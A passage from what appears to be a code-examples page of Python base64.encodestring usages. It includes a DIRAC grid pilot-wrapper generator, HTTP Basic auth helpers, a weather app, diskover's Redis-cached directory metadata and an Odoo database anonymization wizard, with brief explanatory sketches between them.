  if "LD_LIBRARY_PATH" not in os.environ:
    os.environ["LD_LIBRARY_PATH"]=""
  os.environ["X509_USER_PROXY"]=os.path.join(pilotWorkingDirectory, 'proxy')
  if "%(httpProxy)s":
    os.environ["HTTP_PROXY"]="%(httpProxy)s"
  os.environ["X509_CERT_DIR"]=os.path.join(pilotWorkingDirectory, 'etc/grid-security/certificates')
  # TODO: structure the output
  print '==========================================================='
  print 'Environment of execution host'
  for key in os.environ.keys():
    print key + '=' + os.environ[key]
  print '==========================================================='
except Exception, x:
  print >> sys.stderr, x
  sys.exit(-1)
cmd = "python %(pilotScript)s %(pilotOptions)s"
print 'Executing: ', cmd
sys.stdout.flush()
os.system( cmd )

shutil.rmtree( pilotWorkingDirectory )

EOF
""" % {
            'compressedAndEncodedProxy': compressedAndEncodedProxy,
            'compressedAndEncodedPilot': compressedAndEncodedPilot,
            'compressedAndEncodedInstall': compressedAndEncodedInstall,
            'httpProxy': httpProxy,
            'pilotScript': os.path.basename(self.pilot),
            'installScript': os.path.basename(self.install),
            'pilotOptions': ' '.join(pilotOptions),
            'pilotExecDir': pilotExecDir
        }

        fd, name = tempfile.mkstemp(suffix='_pilotwrapper.py',
                                    prefix='DIRAC_',
                                    dir=workingDirectory)
        pilotWrapper = os.fdopen(fd, 'w')
        pilotWrapper.write(localPilot)
        pilotWrapper.close()

        return name
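A standalone sketch of the pack/unpack pattern used by the wrapper above (Python 2 style to match the generated script; the payload value is made up): bz2-compress the data, base64-encode it so it can be pasted into generated source as a single line, then reverse both steps on the receiving end.

import base64
import bz2

payload = 'print "hello from the pilot"\n'
packed = base64.encodestring(bz2.compress(payload, 9)).replace('\n', '')
restored = bz2.decompress(base64.decodestring(packed))
assert restored == payload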
Example #54
0
    def format_auth_basic(self):
        auth = '{}:{}'.format(self._user, self._password)
        return "Basic {}".format(base64.encodestring(auth).replace('\n', ''))
Example #55
0
    def send_auth(self, h):
        if self.username is not None and self.password is not None:
            h.putheader(
                'AUTHORIZATION', "Basic %s" % string.replace(
                    encodestring("%s:%s" %
                                 (self.username, self.password)), "\012", ""))
Example #56
0
"""
 Base64 encode/decode an image.
"""

import snappy
import zlib
import base64
import mechanize
import requests

jpg_file = "mike_grey.jpg"
jpg_text = base64.encodestring(open(jpg_file, "rb").read())
print jpg_text
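A hedged round-trip sketch (the output file name is an assumption): decoding the text and writing it back out in binary mode reproduces the original image.

with open("mike_grey_copy.jpg", "wb") as out:
    out.write(base64.decodestring(jpg_text))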
Example #57
0
    def retrieveData(self, name):
        try:
            #query
            baseurl = "https://query.yahooapis.com/v1/public/yql?"
            yql_query = "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text=\"" + name + "\") and u=\"c\""
            yql_url = baseurl + urllib.parse.urlencode({'q': yql_query
                                                        }) + "&format=json"
            result = urllib.request.urlopen(yql_url).read()
            data = json.loads(result.decode())

            #data retrieve
            city = data['query']['results']['channel']['location']['city']
            country = data['query']['results']['channel']['location'][
                'country']
            region = data['query']['results']['channel']['location']['region']
            self.LOCATION_VALUE.set(city + " " + country + " " + region)

            temp = data['query']['results']['channel']['item']['condition'][
                'temp']
            tempU = data['query']['results']['channel']['units']['temperature']
            if (tempU == 'C'):
                tempU = '°'
            text = data['query']['results']['channel']['item']['condition'][
                'text']
            low = data['query']['results']['channel']['item']['forecast'][0][
                'low']
            high = data['query']['results']['channel']['item']['forecast'][0][
                'high']
            self.CONDITION_VALUE.set(temp + tempU + " " + text + " Min " +
                                     low + tempU + " Max " + high + tempU)

            speed = data['query']['results']['channel']['wind']['speed']
            speedU = data['query']['results']['channel']['units']['speed']
            self.WIND_VALUE.set(speed + speedU)

            humidity = data['query']['results']['channel']['atmosphere'][
                'humidity']
            pressure = data['query']['results']['channel']['atmosphere'][
                'pressure']
            pressureU = data['query']['results']['channel']['units'][
                'pressure']
            self.ATMOSPHERE_VALUE.set("Humidity " + humidity + "% Pressure " +
                                      pressure + pressureU)

            sunrise = data['query']['results']['channel']['astronomy'][
                'sunrise']
            sunset = data['query']['results']['channel']['astronomy']['sunset']
            self.ASTRONOMY_VALUE.set("Sunset " + sunrise + " Sunrise " +
                                     sunset)

            lastUptate = data['query']['results']['channel']['item']['pubDate']
            self.LAST_UPDATE_VALUE.set(lastUptate)

            self.forecastList.delete(0, END)
            for i in range(
                    1,
                    len(data['query']['results']['channel']['item']
                        ['forecast']), 1):
                forecast = data['query']['results']['channel']['item'][
                    'forecast'][i]
                self.forecastList.insert(
                    END, forecast['day'] + " " + forecast['date'] + " " +
                    forecast['text'] + " Min " + forecast['low'] + tempU +
                    " Max " + forecast['high'] + tempU)

            coord = self.retrieveGeoData(name)
            self.image_url = "http://maps.google.com/maps/api/staticmap?center=" + str(
                coord['latitude']
            ) + "," + str(coord['longitude']) + "&zoom=" + str(
                self._MapZoom
            ) + "&size=" + str(self._MapWidth) + "x" + str(
                self._MapHeight
            ) + "&format=gif&maptype=terrain&markers=size:mid%7Ccolor:red%7C" + str(
                coord['latitude']) + "," + str(
                    coord['longitude']) + "&sensor=false&"
            self.image_byt = urlopen(self.image_url).read()
            self.image_b64 = base64.encodestring(self.image_byt)
            self.photo = PhotoImage(data=self.image_b64)
            self.mapView.delete(ALL)
            self.mapView.create_image(0, 0, image=self.photo, anchor="nw")
        except urllib.error.URLError:
            self.showInternetErrorMsg()
            self.quit()
        except TypeError:
            self.showBadCityMessage()
            self.LOCATION_VALUE.set("- - -")
            self.CONDITION_VALUE.set("- - -")
            self.WIND_VALUE.set("- - -")
            self.ATMOSPHERE_VALUE.set("- - -")
            self.ASTRONOMY_VALUE.set("- - -")
            self.LAST_UPDATE_VALUE.set("- - -")
            self.mapView.delete(ALL)
            self.forecastList.delete(0, END)
        else:
            pass
        finally:
            pass
Example #58
0
    def get_auth(self):
        return "Basic %s" % base64.encodestring(
            ("%s:%s" % (self.account["username"], self.account["private:password"]))).strip()
Example #59
0
def get_dir_meta(worker_name, path, cliargs, reindex_dict):
    """This is the get directory meta data function.
    It gets directory metadata and returns dir meta dict.
    It checks if meta data is in Redis and compares times
    mtime and ctime on disk compared to Redis and if same
    returns sametimes string.
    """

    try:
        lstat_path = os.lstat(path)
        mtime_unix = lstat_path.st_mtime
        mtime_utc = datetime.utcfromtimestamp(mtime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        atime_unix = lstat_path.st_atime
        atime_utc = datetime.utcfromtimestamp(atime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        ctime_unix = lstat_path.st_ctime
        ctime_utc = datetime.utcfromtimestamp(ctime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        if cliargs['index2']:
            # check if directory times cached in Redis
            redis_dirtime = redis_conn.get(
                base64.encodestring(path.encode('utf-8', errors='ignore')))
            if redis_dirtime:
                cached_times = float(redis_dirtime.decode('utf-8'))
                # check if cached times are the same as on disk
                current_times = float(mtime_unix + ctime_unix)
                if cached_times == current_times:
                    return "sametimes"
        # get time now in utc
        indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
        # get user id of owner
        uid = lstat_path.st_uid
        # try to get owner user name
        # first check cache
        if uid in uids:
            owner = owners[uid]
        # not in cache
        else:
            try:
                owner = pwd.getpwuid(uid).pw_name.split('\\')
                # remove domain before owner
                if len(owner) == 2:
                    owner = owner[1]
                else:
                    owner = owner[0]
            # if we can't find the owner's user name, use the uid number
            except KeyError:
                owner = uid
            # store it in cache
            if not uid in uids:
                uids.append(uid)
                owners[uid] = owner
        # get group id
        gid = lstat_path.st_gid
        # try to get group name
        # first check cache
        if gid in gids:
            group = groups[gid]
        # not in cache
        else:
            try:
                group = grp.getgrgid(gid).gr_name.split('\\')
                # remove domain before group
                if len(group) == 2:
                    group = group[1]
                else:
                    group = group[0]
            # if we can't find the group name, use the gid number
            except KeyError:
                group = gid
            # store in cache
            if not gid in gids:
                gids.append(gid)
                groups[gid] = group

        inode = lstat_path.st_ino
        hardlinks = lstat_path.st_nlink

        filename = os.path.basename(path)
        parentdir = os.path.abspath(os.path.join(path, os.pardir))
        fullpath = os.path.abspath(os.path.join(parentdir, filename))

        dirmeta_dict = {
            "filename": filename,
            "path_parent": parentdir,
            "filesize": 0,
            "items": 1,  # 1 for itself
            "items_files": 0,
            "items_subdirs": 0,
            "last_modified": mtime_utc,
            "last_access": atime_utc,
            "last_change": ctime_utc,
            "hardlinks": hardlinks,
            "inode": inode,
            "owner": owner,
            "group": group,
            "tag": "",
            "tag_custom": "",
            "crawl_time": 0,
            "change_percent_filesize": "",
            "change_percent_items": "",
            "change_percent_items_files": "",
            "change_percent_items_subdirs": "",
            "worker_name": worker_name,
            "indexing_date": indextime_utc,
            "_type": "directory"
        }

        # check plugins for adding extra meta data to dirmeta_dict
        for plugin in diskover.plugins:
            try:
                # check if plugin is for directory doc
                mappings = {'mappings': {'directory': {'properties': {}}}}
                plugin.add_mappings(mappings)
                dirmeta_dict.update(plugin.add_meta(fullpath))
            except KeyError:
                pass

        # add any autotags to dirmeta_dict
        if cliargs['autotag'] and len(diskover.config['autotag_dirs']) > 0:
            auto_tag(dirmeta_dict, 'directory', mtime_unix, atime_unix,
                     ctime_unix)

        # search for and copy over any existing tags from reindex_dict
        for sublist in reindex_dict['directory']:
            if sublist[0] == fullpath:
                dirmeta_dict['tag'] = sublist[1]
                dirmeta_dict['tag_custom'] = sublist[2]
                break

    except (IOError, OSError):
        return None

    # cache directory times in Redis, encode path (key) using base64
    if diskover.config['redis_cachedirtimes'] == 'True' or diskover.config[
            'redis_cachedirtimes'] == 'true':
        redis_conn.set(base64.encodestring(
            path.encode('utf-8', errors='ignore')),
                       mtime_unix + ctime_unix,
                       ex=diskover.config['redis_dirtimesttl'])

    return dirmeta_dict
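A minimal, self-contained sketch of the Redis caching used above (the connection settings and TTL are assumptions): the directory path is base64-encoded so it becomes a clean key, and mtime + ctime is stored with an expiry so unchanged directories can be skipped on the next crawl.

import base64
import os

import redis

redis_conn = redis.StrictRedis(host='localhost', port=6379, db=0)

def cache_dir_times(path, ttl=604800):
    # Store mtime + ctime under the base64-encoded path, expiring after ttl seconds.
    st = os.lstat(path)
    key = base64.encodestring(path.encode('utf-8', errors='ignore'))
    redis_conn.set(key, st.st_mtime + st.st_ctime, ex=ttl)

def dir_times_unchanged(path):
    # True when the cached value matches what is currently on disk.
    st = os.lstat(path)
    key = base64.encodestring(path.encode('utf-8', errors='ignore'))
    cached = redis_conn.get(key)
    return cached is not None and float(cached) == st.st_mtime + st.st_ctime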
Example #60
0
    def anonymize_database(self, cr, uid, ids, context=None):
        """Sets the 'anonymized' state to defined fields"""

        # create a new history record:
        anonymization_history_model = self.pool.get(
            'ir.model.fields.anonymization.history')

        vals = {
            'date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
            'state': 'started',
            'direction': 'clear -> anonymized',
        }
        history_id = anonymization_history_model.create(cr, uid, vals)

        # check that all the defined fields are in the 'clear' state
        state = self.pool.get(
            'ir.model.fields.anonymization')._get_global_state(cr,
                                                               uid,
                                                               context=context)
        if state == 'anonymized':
            self._raise_after_history_update(
                cr, uid, history_id, _('Error !'),
                _("The database is currently anonymized, you cannot anonymize it again."
                  ))
        elif state == 'unstable':
            msg = _("The database anonymization is currently in an unstable state. Some fields are anonymized," + \
                  " while some fields are not anonymized. You should try to solve this problem before trying to do anything.")
            self._raise_after_history_update(cr, uid, history_id, 'Error !',
                                             msg)

        # do the anonymization:
        dirpath = os.environ.get('HOME') or os.getcwd()
        rel_filepath = 'field_anonymization_%s_%s.pickle' % (cr.dbname,
                                                             history_id)
        abs_filepath = os.path.abspath(os.path.join(dirpath, rel_filepath))

        ir_model_fields_anonymization_model = self.pool.get(
            'ir.model.fields.anonymization')
        field_ids = ir_model_fields_anonymization_model.search(
            cr, uid, [('state', '<>', 'not_existing')], context=context)
        fields = ir_model_fields_anonymization_model.browse(cr,
                                                            uid,
                                                            field_ids,
                                                            context=context)

        if not fields:
            msg = "No fields are going to be anonymized."
            self._raise_after_history_update(cr, uid, history_id, 'Error !',
                                             msg)

        data = []

        for field in fields:
            model_name = field.model_id.model
            field_name = field.field_id.name
            field_type = field.field_id.ttype
            table_name = self.pool[model_name]._table

            # get the current value
            sql = "select id, %s from %s" % (field_name, table_name)
            cr.execute(sql)
            records = cr.dictfetchall()
            for record in records:
                data.append({
                    "model_id": model_name,
                    "field_id": field_name,
                    "id": record['id'],
                    "value": record[field_name]
                })

                # anonymize the value:
                anonymized_value = None

                sid = str(record['id'])
                if field_type == 'char':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'selection':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'text':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'boolean':
                    anonymized_value = random.choice([True, False])
                elif field_type == 'date':
                    anonymized_value = '2011-11-11'
                elif field_type == 'datetime':
                    anonymized_value = '2011-11-11 11:11:11'
                elif field_type == 'float':
                    anonymized_value = 0.0
                elif field_type == 'integer':
                    anonymized_value = 0
                elif field_type in [
                        'binary', 'many2many', 'many2one', 'one2many',
                        'reference'
                ]:  # cannot anonymize these kind of fields
                    msg = _(
                        "Cannot anonymize fields of these types: binary, many2many, many2one, one2many, reference."
                    )
                    self._raise_after_history_update(cr, uid, history_id,
                                                     'Error !', msg)

                if anonymized_value is None:
                    self._raise_after_history_update(
                        cr, uid, history_id, _('Error !'),
                        _("Anonymized value can not be empty."))

                sql = "update %(table)s set %(field)s = %%(anonymized_value)s where id = %%(id)s" % {
                    'table': table_name,
                    'field': field_name,
                }
                cr.execute(sql, {
                    'anonymized_value': anonymized_value,
                    'id': record['id']
                })

        # save pickle:
        fn = open(abs_filepath, 'wb')
        pickle.dump(data, fn, pickle.HIGHEST_PROTOCOL)
        fn.close()

        # update the anonymization fields:
        values = {
            'state': 'anonymized',
        }
        ir_model_fields_anonymization_model.write(cr,
                                                  uid,
                                                  field_ids,
                                                  values,
                                                  context=context)

        # add a result message in the wizard:
        msgs = [
            "Anonymization successful.",
            "",
            "Donot forget to save the resulting file to a safe place because you will not be able to revert the anonymization without this file.",
            "",
            "This file is also stored in the %s directory. The absolute file path is: %s.",
        ]
        msg = '\n'.join(msgs) % (dirpath, abs_filepath)

        fn = open(abs_filepath, 'rb')

        self.write(cr, uid, ids, {
            'msg': msg,
            'file_export': base64.encodestring(fn.read()),
        })
        fn.close()

        # update the history record:
        anonymization_history_model.write(
            cr, uid, history_id, {
                'field_ids': [[6, 0, field_ids]],
                'msg': msg,
                'filepath': abs_filepath,
                'state': 'done',
            })

        # handle the view:
        view_id = self.pool['ir.model.data'].xmlid_to_res_id(
            cr, uid,
            'anonymization.view_ir_model_fields_anonymize_wizard_form')

        return {
            'res_id': ids[0],
            'view_id': [view_id],
            'view_type': 'form',
            "view_mode": 'form',
            'res_model': 'ir.model.fields.anonymize.wizard',
            'type': 'ir.actions.act_window',
            'context': {
                'step': 'just_anonymized'
            },
            'target': 'new',
        }
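A small, self-contained sketch of the export step above (the file name and sample record are made up): pickle the collected values to disk in binary mode, then re-read the file and base64-encode it so it can be stored in the wizard's binary file_export field.

import base64
import pickle

data = [{'model_id': 'res.partner', 'field_id': 'name', 'id': 1, 'value': 'xxx1'}]
with open('field_anonymization_demo.pickle', 'wb') as fh:
    pickle.dump(data, fh, pickle.HIGHEST_PROTOCOL)
with open('field_anonymization_demo.pickle', 'rb') as fh:
    file_export = base64.encodestring(fh.read())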